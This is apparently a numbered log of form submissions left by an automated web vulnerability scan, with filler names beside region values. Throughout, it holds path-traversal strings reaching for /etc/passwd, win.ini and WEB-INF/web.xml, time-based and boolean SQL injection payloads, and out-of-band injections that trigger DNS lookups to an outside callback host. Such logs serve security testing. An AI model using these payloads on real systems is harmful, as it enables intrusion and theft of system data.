/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., North-Western US,
 457. etdyllec, North-Western US,
 458. etdyllec, North-Western US,
 459. ................etc/passwd, North-Western US,
 460. etdyllec, North-Western US,
 461. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, North-Western US,
 462. etdyllec, North-Western US,
 463. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, North-Western US,
 464. etdyllec, North-Western US,
 465. /.././.././.././.././.././.././.././../etc/./passwd%00, North-Western US,
 466. etdyllec, North-Western US,
 467. %2fetc%2fpasswd, North-Western US,
 468. etdyllec, North-Western US,
 469. /etc/passwd, North-Western US,
 470. etdyllec, North-Western US,
 471. .\./.\./.\./.\./.\./.\./etc/passwd, North-Western US,
 472. etdyllec, North-Western US,
 473. /../..//../..//../..//../..//../..//etc/passwd.jpg, North-Western US,
 474. etdyllec, North-Western US,
 475. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Western US,
 476. etdyllec, North-Western US,
 477. ../../../../../../../../../../etc/passwd.jpg, North-Western US,
 478. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Western US,
 479. ../../../../../../../../../../../../../../../proc/version, North-Western US,
 480. ../../../../../../../../../../etc/passwd, North-Western US,
 481. etdyllec, North-Eastern US,
 482. etdyllec, North-Eastern US,
 483. etdyllec, North-Eastern US,
 484. etdyllec, North-Eastern US,
 485. etdyllec, North-Eastern US,
 486. etdyllec, North-Eastern US,
 487. etdyllec, North-Eastern US,
 488. etdyllec, North-Eastern US,
 489. etdyllec, North-Eastern US,
 490. etdyllec, North-Eastern US,
 491. etdyllec, North-Eastern US,
 492. etdyllec, North-Eastern US,
 493. etdyllec, North-Eastern US,
 494. etdyllec, Mid-Southern US,
 495. etdyllec, Mid-Southern US,
 496. etdyllec, Mid-Southern US,
 497. etdyllec, Mid-Southern US,
 498. etdyllec, Mid-Southern US,
 499. etdyllec, Mid-Southern US,
 500. etdyllec, Mid-Southern US,
 501. etdyllec, Mid-Southern US,
 502. WEB-INFweb.xml, North-Eastern US,
 503. etdyllec, Mid-Southern US,
 504. WEB-INF/web.xml, North-Eastern US,
 505. etdyllec, Mid-Southern US,
 506. etdyllec, Mid-Southern US,
 507. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., North-Eastern US,
 508. etdyllec, Mid-Southern US,
 509. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, North-Eastern US,
 510. etdyllec, Mid-Southern US,
 511. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, North-Eastern US,
 512. /.\./.\./.\./.\./.\./.\./windows/win.ini, North-Eastern US,
 513. ................windowswin.ini, North-Eastern US,
 514. ................windowswin.ini, North-Eastern US,
 515. windowswin.ini, North-Eastern US,
 516. ../../../../../../../../../../windows/win.ini.jpg, North-Eastern US,
 517. C:WINDOWSsystem32driversetchosts, North-Eastern US,
 518. ../../../../../../../../../../windows/win.ini, North-Eastern US,
 519. WEB-INFweb.xml, North-Eastern US,
 520. /WEB-INF/web.xml, North-Eastern US,
 521. WEB-INF/web.xml, North-Eastern US,
 522. /../../../../../../../etc/passwd, North-Eastern US,
 523. file:///etc/passwd, North-Eastern US,
 524. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., North-Eastern US,
 525. ................etc/passwd, North-Eastern US,
 526. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, North-Eastern US,
 527. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, North-Eastern US,
 528. /.././.././.././.././.././.././.././../etc/./passwd%00, North-Eastern US,
 529. %2fetc%2fpasswd, North-Eastern US,
 530. /etc/passwd, North-Eastern US,
 531. .\./.\./.\./.\./.\./.\./etc/passwd, North-Eastern US,
 532. /../..//../..//../..//../..//../..//etc/passwd.jpg, North-Eastern US,
 533. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Eastern US,
 534. ../../../../../../../../../../etc/passwd.jpg, North-Eastern US,
 535. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, North-Eastern US,
 536. ../../../../../../../../../../../../../../../proc/version, North-Eastern US,
 537. ../../../../../../../../../../etc/passwd, North-Eastern US,
 538. aseyvrtr, Australia Centre,
 539. aseyvrtr, Australia Centre,
 540. aseyvrtr, Australia Centre,
 541. aseyvrtr, Australia Centre,
 542. aseyvrtr, Australia Centre,
 543. aseyvrtr, Australia Centre,
 544. aseyvrtr, Australia Centre,
 545. aseyvrtr, Australia Centre,
 546. etdyllec, Canada Centre,
 547. etdyllec, Canada Centre,
 548. etdyllec, Canada Centre,
 549. etdyllec, Canada Centre,
 550. etdyllec, Canada Centre,
 551. etdyllec, Canada Centre,
 552. etdyllec, Canada Centre,
 553. etdyllec, Canada Centre,
 554. etdyllec, Canada Centre,
 555. etdyllec, Canada Centre,
 556. etdyllec, Canada Centre,
 557. etdyllec, Canada Centre,
 558. etdyllec, Canada Centre,
 559. etdyllec, Canada Centre,
 560. etdyllec, Canada Centre,
 561. etdyllec, Canada Centre,
 562. etdyllec, Canada Centre,
 563. etdyllec, Canada Centre,
 564. aseyvrtr, Southern US,
 565. etdyllec, Canada Centre,
 566. aseyvrtr, Southern US,
 567. etdyllec, Canada Centre,
 568. aseyvrtr, Southern US,
 569. etdyllec, Canada Centre,
 570. aseyvrtr, Southern US,
 571. etdyllec, Canada Centre,
 572. aseyvrtr, Southern US,
 573. etdyllec, Canada Centre,
 574. aseyvrtr, Southern US,
 575. etdyllec, Canada Centre,
 576. aseyvrtr, Southern US,
 577. etdyllec, Canada Centre,
 578. aseyvrtr, Southern US,
 579. aseyvrtr, South-Western US,
 580. aseyvrtr, South-Western US,
 581. aseyvrtr, South-Western US,
 582. aseyvrtr, South-Western US,
 583. aseyvrtr, South-Western US,
 584. aseyvrtr, South-Western US,
 585. aseyvrtr, South-Western US,
 586. aseyvrtr, South-Western US,
 587. WEB-INFweb.xml, Mid-Southern US,
 588. WEB-INF/web.xml, Mid-Southern US,
 589. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., Mid-Southern US,
 590. aseyvrtr, South-Eastern US,
 591. aseyvrtr, South-Eastern US,
 592. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, Mid-Southern US,
 593. aseyvrtr, South-Eastern US,
 594. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, Mid-Southern US,
 595. aseyvrtr, South-Eastern US,
 596. etdyllec, 934',
 597. aseyvrtr, South-Eastern US,
 598. etdyllec, Canada%20Centre';copy (select '') to program 'nslookup dns.sqli.37203.21-1512.21.84109.1.bxss.me,
 599. /.\./.\./.\./.\./.\./.\./windows/win.ini, Mid-Southern US,
 600. aseyvrtr, South-Eastern US,
 601. etdyllec, '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1508.21.84109.1.bxss'||'.me')||',
 602. ................windowswin.ini, Mid-Southern US,
 603. aseyvrtr, South-Eastern US,
 604. etdyllec, Hqm9kdge'));select pg_sleep(14); -- ,
 605. aseyvrtr, South-Eastern US,
 606. ................windowswin.ini, Mid-Southern US,
 607. etdyllec, HEpSAt7a');select pg_sleep(7); -- ,
 608. etdyllec, ZFJnHaTT';select pg_sleep(21); -- ,
 609. windowswin.ini, Mid-Southern US,
 610. ../../../../../../../../../../windows/win.ini.jpg, Mid-Southern US,
 611. etdyllec, opUkCj25'; waitfor delay '0:0:21' -- ,
 612. C:WINDOWSsystem32driversetchosts, Mid-Southern US,
 613. etdyllec, 1 waitfor delay '0:0:21' -- ,
 614. ../../../../../../../../../../windows/win.ini, Mid-Southern US,
 615. etdyllec, (select(0)from(select(sleep(21)))v)/*'+(select(0)from(select(sleep(21)))v)+'"+(select(0)from(select(sleep(21)))v)+"*/,
 616. etdyllec, if(now()=sysdate(),sleep(14),0)/*'XOR(if(now()=sysdate(),sleep(14),0))OR'"XOR(if(now()=sysdate(),sleep(14),0))OR"*/,
 617. WEB-INFweb.xml, Mid-Southern US,
 618. etdyllec, -1" OR 2+402-402-1=0+0+0+1 -- ,
 619. etdyllec, -1' OR 2+868-868-1=0+0+0+1 or 'oGzuF5dl'=',
 620. /WEB-INF/web.xml, Mid-Southern US,
 621. etdyllec, -1' OR 2+838-838-1=0+0+0+1 -- ,
 622. WEB-INF/web.xml, Mid-Southern US,
 623. etdyllec, -1 OR 2+913-913-1=0+0+0+1,
 624. /../../../../../../../etc/passwd, Mid-Southern US,
 625. etdyllec, -1 OR 2+362-362-1=0+0+0+1 -- ,
 626. file:///etc/passwd, Mid-Southern US,
 627. etdyllec, 3YpRilnq,
 628. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., Mid-Southern US,
 629. etdyllec, Canada%20Centre,
 630. ................etc/passwd, Mid-Southern US,
 631. etdyllec, Canada%20Centre,
 632. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, Mid-Southern US,
 633. aseyvrtr, North-Western US,
 634. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, Mid-Southern US,
 635. aseyvrtr, North-Western US,
 636. /.././.././.././.././.././.././.././../etc/./passwd%00, Mid-Southern US,
 637. aseyvrtr, North-Western US,
 638. aseyvrtr, North-Western US,
 639. %2fetc%2fpasswd, Mid-Southern US,
 640. aseyvrtr, North-Western US,
 641. aseyvrtr, North-Western US,
 642. /etc/passwd, Mid-Southern US,
 643. .\./.\./.\./.\./.\./.\./etc/passwd, Mid-Southern US,
 644. aseyvrtr, North-Western US,
 645. /../..//../..//../..//../..//../..//etc/passwd.jpg, Mid-Southern US,
 646. aseyvrtr, North-Western US,
 647. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Mid-Southern US,
 648. ../../../../../../../../../../etc/passwd.jpg, Mid-Southern US,
 649. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Mid-Southern US,
 650. ../../../../../../../../../../../../../../../proc/version, Mid-Southern US,
 651. ../../../../../../../../../../etc/passwd, Mid-Southern US,
 652. aseyvrtr, North-Eastern US,
 653. aseyvrtr, North-Eastern US,
 654. aseyvrtr, North-Eastern US,
 655. aseyvrtr, North-Eastern US,
 656. aseyvrtr, North-Eastern US,
 657. aseyvrtr, North-Eastern US,
 658. aseyvrtr, North-Eastern US,
 659. aseyvrtr, North-Eastern US,
 660. 657', Australia Centre,
 661. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1482.21.84109.1.bxss.me, Australia Centre,
 662. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1481.21.84109.1.bxss'||'.me')||', Australia Centre,
 663. -1" OR 2+678-678-1=0+0+0+1 -- , Australia Centre,
 664. -1' OR 2+258-258-1=0+0+0+1 or 'EDqvB8j1'=', Australia Centre,
 665. -1' OR 2+359-359-1=0+0+0+1 -- , Australia Centre,
 666. -1 OR 2+923-923-1=0+0+0+1, Australia Centre,
 667. -1 OR 2+388-388-1=0+0+0+1 -- , Australia Centre,
 668. XnFzprYe, Australia Centre,
 669. etdyllec, Australia Centre,
 670. aseyvrtr, Mid-Southern US,
 671. etdyllec, Australia Centre,
 672. aseyvrtr, Mid-Southern US,
 673. aseyvrtr, Mid-Southern US,
 674. aseyvrtr, Mid-Southern US,
 675. aseyvrtr, Mid-Southern US,
 676. aseyvrtr, Mid-Southern US,
 677. aseyvrtr, Mid-Southern US,
 678. aseyvrtr, Mid-Southern US,
 679. 270', Southern US,
 680. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1460.21.84109.1.bxss.me, Southern US,
 681. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1459.21.84109.1.bxss'||'.me')||', Southern US,
 682. aseyvrtr, Canada Centre,
 683. -1" OR 2+269-269-1=0+0+0+1 -- , Southern US,
 684. aseyvrtr, Canada Centre,
 685. -1' OR 2+503-503-1=0+0+0+1 or 'A2vvL1qp'=', Southern US,
 686. aseyvrtr, Canada Centre,
 687. -1' OR 2+520-520-1=0+0+0+1 -- , Southern US,
 688. -1 OR 2+479-479-1=0+0+0+1, Southern US,
 689. aseyvrtr, Canada Centre,
 690. -1 OR 2+765-765-1=0+0+0+1 -- , Southern US,
 691. aseyvrtr, Canada Centre,
 692. aseyvrtr, Canada Centre,
 693. e0DhmVpn, Southern US,
 694. aseyvrtr, Canada Centre,
 695. etdyllec, Southern US,
 696. aseyvrtr, Canada Centre,
 697. etdyllec, Southern US,
 698. aseyvrtr, ''"",
 699. aseyvrtr, '",
 700. aseyvrtr, JyI=,
 701. 590', South-Western US,
 702. WEB-INFweb.xml, Canada Centre,
 703. aseyvrtr, @@CDOcY,
 704. WEB-INF/web.xml, Canada Centre,
 705. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1289.21.84109.1.bxss.me, South-Western US,
 706. unexisting/../../../../../../../../../../windows/win.ini...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................., Canada Centre,
 707. aseyvrtr, 1%2527%2522,
 708. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1274.21.84109.1.bxss'||'.me')||', South-Western US,
 709. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini, Canada Centre,
 710. aseyvrtr, 1'",
 711. -1" OR 2+428-428-1=0+0+0+1 -- , South-Western US,
 712. aseyvrtr, Canada%20Centre,
 713. -1' OR 2+693-693-1=0+0+0+1 or 'p16LQSu2'=', South-Western US,
 714. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini, Canada Centre,
 715. -1' OR 2+202-202-1=0+0+0+1 -- , South-Western US,
 716. /.\./.\./.\./.\./.\./.\./windows/win.ini, Canada Centre,
 717. -1 OR 2+291-291-1=0+0+0+1, South-Western US,
 718. ................windowswin.ini, Canada Centre,
 719. -1 OR 2+844-844-1=0+0+0+1 -- , South-Western US,
 720. gBTzfXcq, South-Western US,
 721. ................windowswin.ini, Canada Centre,
 722. etdyllec, South-Western US,
 723. etdyllec, South-Western US,
 724. windowswin.ini, Canada Centre,
 725. ../../../../../../../../../../windows/win.ini.jpg, Canada Centre,
 726. C:WINDOWSsystem32driversetchosts, Canada Centre,
 727. ../../../../../../../../../../windows/win.ini, Canada Centre,
 728. WEB-INFweb.xml, Canada Centre,
 729. /WEB-INF/web.xml, Canada Centre,
 730. WEB-INF/web.xml, Canada Centre,
 731. /../../../../../../../etc/passwd, Canada Centre,
 732. file:///etc/passwd, Canada Centre,
 733. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././., Canada Centre,
 734. ''"", Australia Centre,
 735. ................etc/passwd, Canada Centre,
 736. '", Australia Centre,
 737. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd, Canada Centre,
 738. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd, Canada Centre,
 739. JyI=, Australia Centre,
 740. @@TJBxK, Australia Centre,
 741. 1%2527%2522, Australia Centre,
 742. /.././.././.././.././.././.././.././../etc/./passwd%00, Canada Centre,
 743. %2fetc%2fpasswd, Canada Centre,
 744. 1'", Australia Centre,
 745. /etc/passwd, Canada Centre,
 746. .\./.\./.\./.\./.\./.\./etc/passwd, Canada Centre,
 747. aseyvrtr, Australia Centre,
 748. /../..//../..//../..//../..//../..//etc/passwd.jpg, Canada Centre,
 749. ualwjlgs, Australia Centre,
 750. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Canada Centre,
 751. ualwjlgs, Australia Centre,
 752. 664', South-Eastern US,
 753. ualwjlgs, Australia Centre,
 754. ualwjlgs, Australia Centre,
 755. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-1025.21.84109.1.bxss.me, South-Eastern US,
 756. ../../../../../../../../../../etc/passwd.jpg, Canada Centre,
 757. ualwjlgs, Australia Centre,
 758. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-1018.21.84109.1.bxss'||'.me')||', South-Eastern US,
 759. -1" OR 2+244-244-1=0+0+0+1 -- , South-Eastern US,
 760. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg, Canada Centre,
 761. -1' OR 2+257-257-1=0+0+0+1 or 'PmXIe07U'=', South-Eastern US,
 762. ../../../../../../../../../../../../../../../proc/version, Canada Centre,
 763. -1' OR 2+22-22-1=0+0+0+1 -- , South-Eastern US,
 764. -1 OR 2+697-697-1=0+0+0+1, South-Eastern US,
 765. ../../../../../../../../../../etc/passwd, Canada Centre,
 766. -1 OR 2+901-901-1=0+0+0+1 -- , South-Eastern US,
 767. Kv1fXxXF, South-Eastern US,
 768. etdyllec, South-Eastern US,
 769. etdyllec, South-Eastern US,
 770. ''"", Southern US,
 771. ualwjlgs, Southern US,
 772. '", Southern US,
 773. ualwjlgs, Southern US,
 774. JyI=, Southern US,
 775. ualwjlgs, Southern US,
 776. @@kn10e, Southern US,
 777. ualwjlgs, Southern US,
 778. 1%2527%2522, Southern US,
 779. ualwjlgs, Southern US,
 780. 1'", Southern US,
 781. aseyvrtr, Southern US,
 782. 132', North-Western US,
 783. ualwjlgs, South-Western US,
 784. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-896.21.84109.1.bxss.me, North-Western US,
 785. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-893.21.84109.1.bxss'||'.me')||', North-Western US,
 786. ualwjlgs, South-Western US,
 787. ualwjlgs, South-Western US,
 788. -1" OR 2+837-837-1=0+0+0+1 -- , North-Western US,
 789. ualwjlgs, South-Western US,
 790. -1' OR 2+702-702-1=0+0+0+1 or 'jKoKkjm0'=', North-Western US,
 791. ualwjlgs, South-Western US,
 792. -1' OR 2+434-434-1=0+0+0+1 -- , North-Western US,
 793. -1 OR 2+365-365-1=0+0+0+1, North-Western US,
 794. -1 OR 2+677-677-1=0+0+0+1 -- , North-Western US,
 795. KbDgua2l, North-Western US,
 796. ''"", South-Western US,
 797. etdyllec, North-Western US,
 798. '", South-Western US,
 799. etdyllec, North-Western US,
 800. JyI=, South-Western US,
 801. @@ja8Ax, South-Western US,
 802. ualwjlgs, South-Eastern US,
 803. ualwjlgs, South-Eastern US,
 804. 1%2527%2522, South-Western US,
 805. ualwjlgs, South-Eastern US,
 806. ualwjlgs, South-Eastern US,
 807. fjiufdkm, Australia Centre,
 808. 1'", South-Western US,
 809. ualwjlgs, South-Eastern US,
 810. fjiufdkm, Australia Centre,
 811. aseyvrtr, South-Western US,
 812. fjiufdkm, Australia Centre,
 813. fjiufdkm, Australia Centre,
 814. ualwjlgs, North-Western US,
 815. fjiufdkm, Southern US,
 816. ualwjlgs, North-Western US,
 817. fjiufdkm, Southern US,
 818. fjiufdkm, Southern US,
 819. ualwjlgs, North-Western US,
 820. ualwjlgs, North-Western US,
 821. fjiufdkm, Southern US,
 822. ualwjlgs, North-Western US,
 823. 118', North-Eastern US,
 824. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-789.21.84109.1.bxss.me, North-Eastern US,
 825. ''"", South-Eastern US,
 826. '", South-Eastern US,
 827. qrptiygk, Australia Centre,
 828. qrptiygk, Australia Centre,
 829. JyI=, South-Eastern US,
 830. fjiufdkm, South-Western US,
 831. qrptiygk, Australia Centre,
 832. @@DHfvl, South-Eastern US,
 833. fjiufdkm, South-Western US,
 834. qrptiygk, Australia Centre,
 835. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-784.21.84109.1.bxss'||'.me')||', North-Eastern US,
 836. fjiufdkm, South-Western US,
 837. qrptiygk, Australia Centre,
 838. 1%2527%2522, South-Eastern US,
 839. -1" OR 2+728-728-1=0+0+0+1 -- , North-Eastern US,
 840. -1' OR 2+130-130-1=0+0+0+1 or '6AtHHIWm'=', North-Eastern US,
 841. fjiufdkm, South-Western US,
 842. -1' OR 2+523-523-1=0+0+0+1 -- , North-Eastern US,
 843. ualwjlgs, North-Eastern US,
 844. -1 OR 2+709-709-1=0+0+0+1, North-Eastern US,
 845. -1 OR 2+267-267-1=0+0+0+1 -- , North-Eastern US,
 846. ualwjlgs, North-Eastern US,
 847. 1'", South-Eastern US,
 848. I4oRbB8M, North-Eastern US,
 849. aseyvrtr, South-Eastern US,
 850. ualwjlgs, North-Eastern US,
 851. etdyllec, North-Eastern US,
 852. ualwjlgs, North-Eastern US,
 853. ualwjlgs, North-Eastern US,
 854. etdyllec, North-Eastern US,
 855. fjiufdkm, South-Eastern US,
 856. qrptiygk, Southern US,
 857. fjiufdkm, South-Eastern US,
 858. qrptiygk, Southern US,
 859. fjiufdkm, South-Eastern US,
 860. fjiufdkm, South-Eastern US,
 861. qrptiygk, Southern US,
 862. qrptiygk, Southern US,
 863. qrptiygk, Southern US,
 864. ualwjlgs, Mid-Southern US,
 865. ualwjlgs, Mid-Southern US,
 866. ualwjlgs, Mid-Southern US,
 867. ualwjlgs, Mid-Southern US,
 868. ualwjlgs, Mid-Southern US,
 869. fjiufdkm, North-Western US,
 870. fjiufdkm, North-Western US,
 871. ''"", North-Western US,
 872. fjiufdkm, North-Western US,
 873. fjiufdkm, North-Western US,
 874. '", North-Western US,
 875. qrptiygk, South-Western US,
 876. JyI=, North-Western US,
 877. qrptiygk, South-Western US,
 878. @@wRPsf, North-Western US,
 879. qrptiygk, South-Western US,
 880. 1%2527%2522, North-Western US,
 881. qrptiygk, South-Western US,
 882. ualwjlgs, Canada Centre,
 883. 1'", North-Western US,
 884. aseyvrtr, North-Western US,
 885. ualwjlgs, Canada Centre,
 886. qrptiygk, South-Western US,
 887. ualwjlgs, Canada Centre,
 888. fjiufdkm, North-Eastern US,
 889. fjiufdkm, North-Eastern US,
 890. ualwjlgs, Canada Centre,
 891. orrilrkr, Australia Centre,
